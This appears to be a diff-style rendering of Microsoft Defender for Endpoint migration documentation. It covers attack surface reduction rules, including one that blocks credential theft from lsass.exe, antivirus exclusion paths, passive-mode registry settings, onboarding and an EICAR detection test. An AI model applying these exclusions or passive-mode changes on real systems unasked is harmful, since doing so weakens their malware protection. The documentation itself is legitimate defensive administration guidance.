- | [Block credential stealing from the Windows local security authority subsystem (lsass.exe)](attack-surface-reduction-rules-reference.md#block-credential-stealing-from-the-windows-local-security-authority-subsystem) <br/><br/>[Block abuse of exploited vulnerable signed drivers](attack-surface-reduction-rules-reference.md#block-abuse-of-exploited-vulnerable-signed-drivers)<br/><br/>[Block persistence through Windows Management Instrumentation (WMI) event subscription](attack-surface-reduction-rules-reference.md#block-persistence-through-wmi-event-subscription) | [Intune](enable-attack-surface-reduction.md#intune) (Device configuration profiles or Endpoint Security policies) <br/><br/>[Mobile Device Management (MDM)](enable-attack-surface-reduction.md#mdm) (Use the [./Vendor/MSFT/Policy/Config/Defender/AttackSurfaceReductionRules](/windows/client-management/mdm/policy-csp-defender#defender-attacksurfacereductionrules) configuration service provider (CSP) to individually enable and set the mode for each rule.)<br/><br/>[Group Policy](enable-attack-surface-reduction.md#group-policy) or [PowerShell](enable-attack-surface-reduction.md#powershell) (only if you're not using Intune, Configuration Manager, or another enterprise-level management platform) |
-
- [Learn more about attack surface reduction capabilities](overview-attack-surface-reduction.md).
-
-5. Configure your [next-generation protection capabilities](next-generation-protection.md).
-
- | Capability | Configuration methods |
- |:|:|
- | [Intune](/mem/intune/fundamentals/tutorial-walkthrough-endpoint-manager) |1. In the [Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431), select **Devices** \> **Configuration profiles**, and then select the profile type you want to configure. If you haven't yet created a **Device restrictions** profile type, or if you want to create a new one, see [Configure device restriction settings in Microsoft Intune](/intune/device-restrictions-configure).<br/><br/>2. Select **Properties**, and then select **Configuration settings: Edit**<br/><br/>3. Expand **Microsoft Defender Antivirus**.<br/><br/>4. Enable **Cloud-delivered protection**.<br/><br/>5. In the **Prompt users before sample submission** dropdown, select **Send all samples automatically**.<br/><br/>6. In the **Detect potentially unwanted applications** dropdown, select **Enable** or **Audit**.<br/><br/>7. Select **Review + save**, and then choose **Save**. <br/><br/> **TIP**: For more information about Intune device profiles, including how to create and configure their settings, see [What are Microsoft Intune device profiles?](/intune/device-profiles).|
- |[Configuration Manager](/mem/configmgr)|See [Create and deploy antimalware policies for Endpoint Protection in Configuration Manager](/mem/configmgr/protect/deploy-use/endpoint-antimalware-policies). <br/><br/> When you create and configure your antimalware policies, make sure to review the [real-time protection settings](/mem/configmgr/protect/deploy-use/endpoint-antimalware-policies#real-time-protection-settings) and [enable block at first sight](configure-block-at-first-sight-microsoft-defender-antivirus.md).
- |[Advanced Group Policy Management](/microsoft-desktop-optimization-pack/agpm/) <br/> or <br/> [Group Policy Management Console](/windows/security/threat-protection/microsoft-defender-antivirus/use-group-policy-microsoft-defender-antivirus)|1. Go to **Computer configuration** \> **Administrative templates** \> **Windows components** \> **Microsoft Defender Antivirus**.<br/><br/>2. Look for a policy called **Turn off Microsoft Defender Antivirus**.<br/><br/>3. Choose **Edit policy setting**, and make sure that policy is disabled. This action enables Microsoft Defender Antivirus. (You might see *Windows Defender Antivirus* instead of *Microsoft Defender Antivirus* in some versions of Windows.)|
- |Control Panel in Windows|Follow the guidance here: [Turn on Microsoft Defender Antivirus](/mem/intune/user-help/turn-on-defender-windows). (You might see *Windows Defender Antivirus* instead of *Microsoft Defender Antivirus* in some versions of Windows.)|
-
- *If you have Defender for Endpoint Plan 1, your initial setup and configuration is done for now. If you have Defender for Endpoint Plan 2, continue to steps 6-7.*
-
-6. Configure your endpoint detection and response (EDR) policies in the Intune admin center ([https://endpoint.microsoft.com](https://endpoint.microsoft.com)). To get help with this task, see [Create EDR policies](/mem/intune/protect/endpoint-security-edr-policy#create-edr-policies).
-
-7. Configure your automated investigation and remediation capabilities in the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)). To get help with this task, see [Configure automated investigation and remediation capabilities in Microsoft Defender for Endpoint](configure-automated-investigations-remediation.md).
-
- *At this point, initial setup and configuration of Defender for Endpoint Plan 2 is complete.*
-
-## Step 3: Add Microsoft Defender for Endpoint to the exclusion list for your existing solution
-
-This step of the setup process involves adding Defender for Endpoint to the exclusion list for your existing endpoint protection solution and any other security products your organization is using. Make sure to refer to your solution provider's documentation to add exclusions.
-
-The specific exclusions to configure depend on which version of Windows your endpoints or devices are running, and are listed in the following table.
-
-| OS |Exclusions |
-|:--|:--|
-|[Windows 11](/windows/whats-new/windows-11-overview) <br/><br/>Windows 10, [version 1803](/lifecycle/announcements/windows-server-1803-end-of-servicing) or later (See [Windows 10 release information](/windows/release-health/release-information))<br/><br/>Windows 10, version 1703 or 1709 with [KB4493441](https://support.microsoft.com/help/4493441) installed |`C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseSC.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseTVM.exe`|
-[Windows Server 2022](/windows/release-health/status-windows-server-2022)<br/><br/>[Windows Server 2019](/windows/release-health/status-windows-10-1809-and-windows-server-2019) <br/><br/>[Windows Server 2016](/windows/release-health/status-windows-10-1607-and-windows-server-2016)<br/><br/>[Windows Server 2012 R2](/windows/release-health/status-windows-8.1-and-windows-server-2012-r2)<br/><br/>[Windows Server, version 1803](/windows-server/get-started/whats-new-in-windows-server-1803) | On Windows Server 2012 R2 and Windows Server 2016 running the [modern, unified solution](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016), the following exclusions are required after updating the Sense EDR component using [KB5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac):<br/> <br/> `C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\MsSense.exe` <br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCnCProxy.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseIR.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCE.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseSampleUploader.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCM.exe` <br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseTVM.exe` |
-|[Windows 8.1](/windows/release-health/status-windows-8.1-and-windows-server-2012-r2)<br/><br/>[Windows 7](/windows/release-health/status-windows-7-and-windows-server-2008-r2-sp1)<br/><br/>[Windows Server 2008 R2 SP1](/windows/release-health/status-windows-7-and-windows-server-2008-r2-sp1) |`C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Monitoring Host Temporary Files 6\45\MsSenseS.exe`<br/><br/>**NOTE**: Monitoring Host Temporary Files 6\45 can be different numbered subfolders.<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\AgentControlPanel.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\HealthService.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\HSLockdown.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\MOMPerfSnapshotHelper.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\TestCloudConnection.exe` |
-
-> [!IMPORTANT]
-> As a best practice, keep your organization's devices and endpoints up to date. Make sure to get the [latest updates for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](microsoft-defender-antivirus-updates.md), and keep your organization's operating systems and productivity apps up to date.
--
-## Step 4: Add your existing solution to the exclusion list for Microsoft Defender Antivirus
-
-During this step of the setup process, you add your existing solution to the list of exclusions for Microsoft Defender Antivirus. You can choose from several methods to add your exclusions to Microsoft Defender Antivirus, as listed in the following table:
-
-|Method|What to do|
-|||
-|[Intune](/mem/intune/fundamentals/tutorial-walkthrough-endpoint-manager) |1. Go to the [Microsoft Intune admin center](https://go.microsoft.com/fwlink/?linkid=2109431) and sign in.<br/><br/>2. Select **Devices** \> **Configuration profiles**, and then select the profile that you want to configure.<br/><br/>3. Under **Manage**, select **Properties**.<br/><br/>4. Select **Configuration settings: Edit**.<br/><br/>5. Expand **Microsoft Defender Antivirus**, and then expand **Microsoft Defender Antivirus Exclusions**.<br/><br/>6. Specify the files and folders, extensions, and processes to exclude from Microsoft Defender Antivirus scans. For reference, see [Microsoft Defender Antivirus exclusions](/mem/intune/configuration/device-restrictions-windows-10#microsoft-defender-antivirus-exclusions).<br/><br/>7. Choose **Review + save**, and then choose **Save**.|
-|[Microsoft Endpoint Configuration Manager](/mem/configmgr/)|1. Using the [Configuration Manager console](/mem/configmgr/core/servers/manage/admin-console), go to **Assets and Compliance** \> **Endpoint Protection** \> **Antimalware Policies**, and then select the policy that you want to modify.<br/><br/>2. Specify exclusion settings for files and folders, extensions, and processes to exclude from Microsoft Defender Antivirus scans.|
-|[Group Policy Object](/previous-versions/windows/desktop/Policy/group-policy-objects)|1. On your Group Policy management computer, open the [Group Policy Management Console](https://technet.microsoft.com/library/cc731212.aspx), right-click the Group Policy Object you want to configure and then select **Edit**.<br/><br/>2. In the **Group Policy Management Editor**, go to **Computer configuration** and select **Administrative templates**.<br/><br/>3. Expand the tree to **Windows components \> Microsoft Defender Antivirus \> Exclusions**. (You might see *Windows Defender Antivirus* instead of *Microsoft Defender Antivirus* in some versions of Windows.)<br/><br/>4. Double-click the **Path Exclusions** setting and add the exclusions.<br/><br/>5. Set the option to **Enabled**.<br/><br/>6. Under the **Options** section, select **Show...**.<br/><br/>7. Specify each folder on its own line under the **Value name** column. If you specify a file, make sure to enter a fully qualified path to the file, including the drive letter, folder path, filename, and extension. Enter **0** in the **Value** column.<br/><br/>8. Select **OK**.<br/><br/>9. Double-click the **Extension Exclusions** setting and add the exclusions.<br/><br/>10. Set the option to **Enabled**.<br/><br/>11. Under the **Options** section, select **Show...**.<br/><br/>12. Enter each file extension on its own line under the **Value name** column. Enter **0** in the **Value** column.<br/><br/>13. Select **OK**.|
-|Local group policy object|1. On the endpoint or device, open the Local Group Policy Editor.<br/><br/>2. Go to **Computer Configuration** \> **Administrative Templates** \> **Windows Components** \> **Microsoft Defender Antivirus** \> **Exclusions**. (You might see *Windows Defender Antivirus* instead of *Microsoft Defender Antivirus* in some versions of Windows.)<br/><br/>3. Specify your path and process exclusions.|
-|Registry key|1. Export the following registry key: `HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\exclusions`.<br/><br/>2. Import the registry key. Here are two examples:<br/>- Local path: `regedit.exe /s c:\temp\MDAV_Exclusion.reg`<br/>- Network share: `regedit.exe /s \\FileServer\ShareName\MDAV_Exclusion.reg`|
-
-[Learn more about exclusions for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](defender-endpoint-antivirus-exclusions.md).
-
-### Keep the following points about exclusions in mind
-
-When you add [exclusions to Microsoft Defender Antivirus scans](/windows/security/threat-protection/microsoft-defender-antivirus/configure-exclusions-microsoft-defender-antivirus), you should add path and process exclusions.
--- *Path exclusions* exclude specific files and whatever those files access.-- *Process exclusions* exclude whatever a process touches, but doesn't exclude the process itself.-- List your process exclusions using their full path and not by their name only. (The name-only method is less secure.)-- If you list each executable (.exe) as both a path exclusion and a process exclusion, the process and whatever it touches are excluded.-
-## Step 5: Set up your device groups, device collections, and organizational units
-
-Device groups, device collections, and organizational units enable your security team to manage and assign security policies efficiently and effectively. The following table describes each of these groups and how to configure them. Your organization might not use all three collection types.
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-|Collection type|What to do|
-|||
-|[Device groups](/microsoft-365/security/defender-endpoint/machine-groups) (formerly called *machine groups*) enable your security operations team to configure security capabilities, such as automated investigation and remediation. <br/><br/> Device groups are also useful for assigning access to those devices so that your security operations team can take remediation actions if needed. <br/><br/> Device groups are created while the attack was detected and stopped, alerts, such as an "initial access alert," were triggered and appeared in the [Microsoft Defender portal](/microsoft-365/security/defender/microsoft-365-defender).|1. Go to the Microsoft Defender portal (<https://security.microsoft.com>).<br/><br/>2. In the navigation pane on the left, choose **Settings** \> **Endpoints** \> **Permissions** \> **Device groups**.<br/><br/>3. Choose **+ Add device group**.<br/><br/>4. Specify a name and description for the device group.<br/><br/>5. In the **Automation level** list, select an option. (We recommend **Full - remediate threats automatically**.) To learn more about the various automation levels, see [How threats are remediated](/microsoft-365/security/defender-endpoint/automated-investigations#how-threats-are-remediated).<br/><br/>6. Specify conditions for a matching rule to determine which devices belong to the device group. For example, you can choose a domain, OS versions, or even use [device tags](/microsoft-365/security/defender-endpoint/machine-tags).<br/><br/>7. On the **User access** tab, specify roles that should have access to the devices that are included in the device group.<br/><br/>8. Choose **Done**.|
-|[Device collections](/mem/configmgr/core/clients/manage/collections/introduction-to-collections) enable your security operations team to manage applications, deploy compliance settings, or install software updates on the devices in your organization. <br/><br/> Device collections are created by using [Configuration Manager](/mem/configmgr/).|Follow the steps in [Create a collection](/mem/configmgr/core/clients/manage/collections/create-collections#bkmk_create).|
-|[Organizational units](/azure/active-directory-domain-services/create-ou) enable you to logically group objects such as user accounts, service accounts, or computer accounts. <br/><br/> You can then assign administrators to specific organizational units, and apply group policy to enforce targeted configuration settings. <br/><br/> Organizational units are defined in [Microsoft Entra Domain Services](/azure/active-directory-domain-services).|Follow the steps in [Create an Organizational Unit in a Microsoft Entra Domain Services managed domain](/azure/active-directory-domain-services/create-ou).|
-
-## Next step
-
-**Congratulations**! You've completed the Setup phase of [migrating to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)!
--- [Proceed to Phase 3: Onboard to Defender for Endpoint](switch-to-mde-phase-3.md)
security Switch To Mde Phase 3 https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-phase-3.md
- Title: Migrate to Microsoft Defender for Endpoint - Onboard
-description: Move to Microsoft Defender for Endpoint. Onboard devices and then uninstall your non-Microsoft solution.
------
- - m365-security
- - m365solution-migratetomdatp
- - highpri
- - tier1
--- migrationguides-- admindeeplinkDEFENDER- Previously updated : 10/24/2023---
-# Migrate to Microsoft Defender for Endpoint - Phase 3: Onboard
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-| [![Phase 1: Prepare3.](medi) | ![Phase 3: Onboard](media/phase-diagrams/onboard.png#lightbox)<br/>Phase 3: Onboard |
-|--|--|--|
-|| |*You're here!* |
-
-**Welcome to Phase 3 of [migrating to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)**. This migration phase includes the following steps:
-
-1. [Onboard devices to Defender for Endpoint](#step-1-onboard-devices-to-microsoft-defender-for-endpoint).
-2. [Run a detection test](#step-2-run-a-detection-test).
-3. [Confirm that Microsoft Defender Antivirus is in passive mode on your endpoints](#step-3-confirm-that-microsoft-defender-antivirus-is-in-passive-mode-on-your-endpoints).
-4. [Get updates for Microsoft Defender Antivirus](#step-4-get-updates-for-microsoft-defender-antivirus).
-5. [Uninstall your non-Microsoft solution](#step-5-uninstall-your-non-microsoft-solution).
-6. [Make sure Defender for Endpoint is working correctly](#step-6-make-sure-defender-for-endpoint-is-working-correctly).
-
-## Step 1: Onboard devices to Microsoft Defender for Endpoint
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Choose **Settings** \> **Endpoints** \> **Onboarding** (under **Device management**).
-
-3. In the **Select operating system to start onboarding process** list, select an operating system.
-
-4. Under **Deployment method**, select an option. Follow the links and prompts to onboard your organization's devices. Need help? See [Onboarding methods](#onboarding-methods) (in this article).
-
-> [!NOTE]
-> If something goes wrong while onboarding, see [Troubleshoot Microsoft Defender for Endpoint onboarding issues](troubleshoot-onboarding.md). That article describes how to resolve onboarding issues and common errors on endpoints.
-
-### Onboarding methods
-
-Deployment methods vary, depending on operating system and preferred methods. The following table lists resources to help you onboard to Defender for Endpoint:
-
-|Operating systems |Methods |
-|||
-|Windows 10 or later<br/><br/>Windows Server 2019 or later<br/><br/>Windows Server, version 1803 or later<br/><br/>Windows Server 2016 or Windows Server 2012 R2<sup>[[1](#fn1)]<sup> | [Microsoft Intune or Mobile Device Management](configure-endpoints-mdm.md)<br/><br/>[Microsoft Configuration Manager](configure-endpoints-sccm.md)<br/><br/>[Group Policy](configure-endpoints-gp.md)<br/><br/>[VDI scripts](configure-endpoints-vdi.md)<br/><br/>[Local script (up to 10 devices)](configure-endpoints-script.md)<br/> The local script method is suitable for a proof of concept but shouldn't be used for production deployment. For a production deployment, we recommend using Group Policy, Microsoft Configuration Manager, or Intune. |
-|Windows Server 2008 R2 SP1 | [Microsoft Monitoring Agent (MMA)](onboard-downlevel.md#install-and-configure-microsoft-monitoring-agent-mma) or [Microsoft Defender for Cloud](/azure/security-center/security-center-wdatp) <br> The Microsoft Monitoring Agent is now Azure Log Analytics agent. To learn more, see [Log Analytics agent overview](/azure/azure-monitor/platform/log-analytics-agent). |
-|Windows 8.1 Enterprise<br/><br/>Windows 8.1 Pro<br/><br/>Windows 7 SP1 Pro<br/><br/>Windows 7 SP1| [Microsoft Monitoring Agent (MMA)](onboard-downlevel.md) <br>The Microsoft Monitoring Agent is now Azure Log Analytics agent. To learn more, see [Log Analytics agent overview](/azure/azure-monitor/platform/log-analytics-agent).
-|**Windows servers<br><br>Linux servers** | [Integration with Microsoft Defender for Cloud](azure-server-integration.md)
-|macOS|[Local script](mac-install-manually.md) <br> [Microsoft Intune](mac-install-with-intune.md) <br> [JAMF Pro](mac-install-with-jamf.md) <br> [Mobile Device Management](mac-install-with-other-mdm.md)|
-|Linux Server|[Local script](linux-install-manually.md) <br> [Puppet](linux-install-with-puppet.md) <br> [Ansible](linux-install-with-ansible.md) <br> [Chef](linux-deploy-defender-for-endpoint-with-chef.md)|
-|Android|[Microsoft Intune](android-intune.md)|
-|iOS|[Microsoft Intune](ios-install.md) <br> [Mobile Application Manager](ios-install-unmanaged.md) |
-
-(<a id="fn1">1</a>) Windows Server 2016 and Windows Server 2012 R2 must be onboarded using the instructions in [Onboard Windows servers](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016).
-
-> [!IMPORTANT]
-> The standalone versions of Defender for Endpoint Plan 1 and Plan 2 do not include server licenses. To onboard servers, you'll need an additional license, such as [Microsoft Defender for Servers Plan 1 or Plan 2](/azure/defender-for-cloud/plan-defender-for-servers-select-plan). To learn more, see [Defender for Endpoint onboarding Windows Server](onboard-windows-server.md).
-
-## Step 2: Run a detection test
-
-To verify that your onboarded devices are properly connected to Defender for Endpoint, you can run a detection test.
-
-|Operating system|Guidance|
-|||
-|Windows 10 or later<br/><br/>Windows Server 2022<br/><br/>Windows Server 2019<br/><br/>Windows Server, version 1803, or later<br/><br/>Windows Server 2016<br/><br/>Windows Server 2012 R2|See [Run a detection test](run-detection-test.md).|
-|macOS (see [System requirements](microsoft-defender-endpoint-mac.md)|Download and use the DIY app at <https://aka.ms/mdatpmacosdiy>. <br/><br/> For more information, see [Defender for Endpoint on macOS](microsoft-defender-endpoint-mac.md).|
-|Linux (see [System requirements](microsoft-defender-endpoint-linux.md#system-requirements))|1. Run the following command, and look for a result of **1**: `mdatp health --field real_time_protection_enabled`.<br/><br/>2. Open a Terminal window, and run the following command: `curl -o ~/Downloads/eicar.com.txt https://www.eicar.org/download/eicar.com.txt`.<br/><br/>3. Run the following command to list any detected threats: `mdatp threat list`.<br/><br/>For more information, see [Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md).|
-
-## Step 3: Confirm that Microsoft Defender Antivirus is in passive mode on your endpoints
-
-Now that your endpoints have been onboarded to Defender for Endpoint, your next step is to make sure Microsoft Defender Antivirus is running in passive mode by using PowerShell.
-
-1. On a Windows device, open Windows PowerShell as an administrator.
-
-2. Run the following PowerShell cmdlet: `Get-MpComputerStatus|select AMRunningMode`.
-
-3. Review the results. You should see **Passive mode**.
-
-> [!NOTE]
-> To learn more about passive mode and active mode, see [More details about Microsoft Defender Antivirus states](microsoft-defender-antivirus-compatibility.md#more-details-about-microsoft-defender-antivirus-states).
-
-### Set Microsoft Defender Antivirus on Windows Server to passive mode manually
-
-To set Microsoft Defender Antivirus to passive mode on Windows Server, version 1803 or newer, or Windows Server 2019, or Windows Server 2022, follow these steps:
-
-1. Open Registry Editor, and then navigate to `Computer\HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Advanced Threat Protection`.
-
-2. Edit (or create) a DWORD entry called **ForceDefenderPassiveMode**, and specify the following settings:
-
- - Set the DWORD's value to **1**.
- - Under **Base**, select **Hexadecimal**.
-
-> [!NOTE]
-> You can use other methods to set the registry key, such as the following:
->
-> - [Group Policy Preference](/previous-versions/windows/it-pro/windows-server-2012-R2-and-2012/dn581922(v=ws.11))
-> - [Local Group Policy Object tool](/windows/security/threat-protection/security-compliance-toolkit-10#what-is-the-local-group-policy-object-lgpo-tool)
-> - [A package in Configuration Manager](/mem/configmgr/apps/deploy-use/packages-and-programs)
-
-### Start Microsoft Defender Antivirus on Windows Server 2016
-
-If you're using Windows Server 2016, you might have to start Microsoft Defender Antivirus manually. You can perform this task by using the PowerShell cmdlet `mpcmdrun.exe -wdenable` on the device.
-
-## Step 4: Get updates for Microsoft Defender Antivirus
-
-Keeping Microsoft Defender Antivirus up to date is critical to assure your devices have the latest technology and features needed to protect against new malware and attack techniques, even if Microsoft Defender Antivirus is running in passive mode. (See [Microsoft Defender Antivirus compatibility](microsoft-defender-antivirus-compatibility.md).)
-
-There are two types of updates related to keeping Microsoft Defender Antivirus up to date:
--- Security intelligence updates--- Product updates-
-To get your updates, follow the guidance in [Manage Microsoft Defender Antivirus updates and apply baselines](microsoft-defender-antivirus-updates.md).
-
-## Step 5: Uninstall your non-Microsoft solution
-
-If, at this point you have onboarded your organization's devices to Defender for Endpoint, and Microsoft Defender Antivirus is installed and enabled, then your next step is to uninstall your non-Microsoft antivirus, antimalware, and endpoint protection solution. When you uninstall your non-Microsoft solution, Microsoft Defender Antivirus changes from passive mode to active mode. In most cases, this happens automatically.
-
-> [!IMPORTANT]
-> If, for some reason, Microsoft Defender Antivirus does not go into active mode after you have uninstalled your non-Microsoft antivirus/antimalware solution, see [Microsoft Defender Antivirus seems to be stuck in passive mode](switch-to-mde-troubleshooting.md#microsoft-defender-antivirus-seems-to-be-stuck-in-passive-mode).
-
-To get help with uninstalling your non-Microsoft solution, contact their technical support team.
-
-## Step 6: Make sure Defender for Endpoint is working correctly
-
-Now that you have onboarded to Defender for Endpoint, and you have uninstalled your former non-Microsoft solution, your next step is to make sure that Defender for Endpoint working correctly.
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. In the navigation pane, choose **Endpoints** > **Device inventory**. There, you're able to see protection status for devices.
-
-To learn more, see [Device inventory](machines-view-overview.md).
-
-## Next step
-
-**Congratulations**! You have completed your [migration to Defender for Endpoint](switch-to-mde-overview.md#the-migration-process)!
--- [Configure your Defender for Endpoint settings](preferences-setup.md).-
security Switch To Mde Troubleshooting https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/switch-to-mde-troubleshooting.md
- Title: Troubleshooting issues when moving to Microsoft Defender for Endpoint
-description: Learn how to troubleshoot issues when you migrate to Microsoft Defender for Endpoint.
------- m365solution-scenario-- m365-security-- highpri-- tier1-- Previously updated : 04/24/2023----
-# Troubleshooting issues when migrating to Microsoft Defender for Endpoint
-
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-This article provides troubleshooting information for security administrators who are experiencing issues when moving from a non-Microsoft endpoint protection solution to Microsoft Defender for Endpoint.
-
-## Microsoft Defender Antivirus is getting uninstalled on Windows Server
-
-When you migrate to Defender for Endpoint, you begin with your non-Microsoft antivirus/antimalware protection in active mode. As part of the setup process, you configure Microsoft Defender Antivirus in passive mode. Occasionally, your non-Microsoft antivirus/antimalware solution might prevent Microsoft Defender Antivirus from running on Windows Server. In fact, it can look like Microsoft Defender Antivirus has been removed from Windows Server.
-
-To resolve this issue, take the following steps:
-
-1. [Add Microsoft Defender for Endpoint to the exclusion list](#add-microsoft-defender-for-endpoint-to-the-exclusion-list).
-2. [Set Microsoft Defender Antivirus to passive mode manually](#set-microsoft-defender-antivirus-to-passive-mode-manually).
-
-### Add Microsoft Defender for Endpoint to the exclusion list
-
-| OS |Exclusions |
-|:--|:--|
-|[Windows 11](/windows/whats-new/windows-11-overview) <br/><br/>Windows 10, [version 1803](/lifecycle/announcements/windows-server-1803-end-of-servicing) or later (See [Windows 10 release information](/windows/release-health/release-information))<br/><br/>Windows 10, version 1703 or 1709 with [KB4493441](https://support.microsoft.com/help/4493441) installed |`C:\Program Files\Windows Defender Advanced Threat Protection\MsSense.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseCncProxy.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseSampleUploader.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseIR.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseCM.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseNdr.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\SenseSC.exe`<br/><br/>`C:\Program Files\Windows Defender Advanced Threat Protection\Classification\SenseCE.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection`<br/><br/>|
-[Windows Server 2022](/windows/release-health/status-windows-server-2022)<br/><br/>[Windows Server 2019](/windows/release-health/status-windows-10-1809-and-windows-server-2019) <br/><br/>[Windows Server 2016](/windows/release-health/status-windows-10-1607-and-windows-server-2016)<br/><br/>[Windows Server 2012 R2](/windows/release-health/status-windows-8.1-and-windows-server-2012-r2)<br/><br/>[Windows Server, version 1803](/windows-server/get-started/whats-new-in-windows-server-1803) | On Windows Server 2012 R2 and Windows Server 2016 running the [modern, unified solution](configure-server-endpoints.md#windows-server-2012-r2-and-windows-server-2016), the following exclusions are required after updating the Sense EDR component using [KB5005292](https://support.microsoft.com/topic/microsoft-defender-for-endpoint-update-for-edr-sensor-f8f69773-f17f-420f-91f4-a8e5167284ac):<br/> <br/> `C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\MsSense.exe` <br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCnCProxy.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseIR.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCE.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseSampleUploader.exe`<br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\Platform\*\SenseCM.exe` <br/><br/>`C:\ProgramData\Microsoft\Windows Defender Advanced Threat Protection\DataCollection`|
-|[Windows 8.1](/windows/release-health/status-windows-8.1-and-windows-server-2012-r2)<br/><br/>[Windows 7](/windows/release-health/status-windows-7-and-windows-server-2008-r2-sp1)<br/><br/>[Windows Server 2008 R2 SP1](/windows/release-health/status-windows-7-and-windows-server-2008-r2-sp1) |`C:\Program Files\Microsoft Monitoring Agent\Agent\Health Service State\Monitoring Host Temporary Files 6\45\MsSenseS.exe`<br/><br/>**NOTE**: Monitoring Host Temporary Files 6\45 can be different numbered subfolders.<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\AgentControlPanel.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\HealthService.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\HSLockdown.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\MOMPerfSnapshotHelper.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\MonitoringHost.exe`<br/><br/>`C:\Program Files\Microsoft Monitoring Agent\Agent\TestCloudConnection.exe` |
-
-> [!IMPORTANT]
-> As a best practice, keep your organization's devices and endpoints up to date. Make sure to get the [latest updates for Microsoft Defender for Endpoint and Microsoft Defender Antivirus](microsoft-defender-antivirus-updates.md), and keep your organization's operating systems and productivity apps up to date.
--
-### Set Microsoft Defender Antivirus to passive mode manually
-
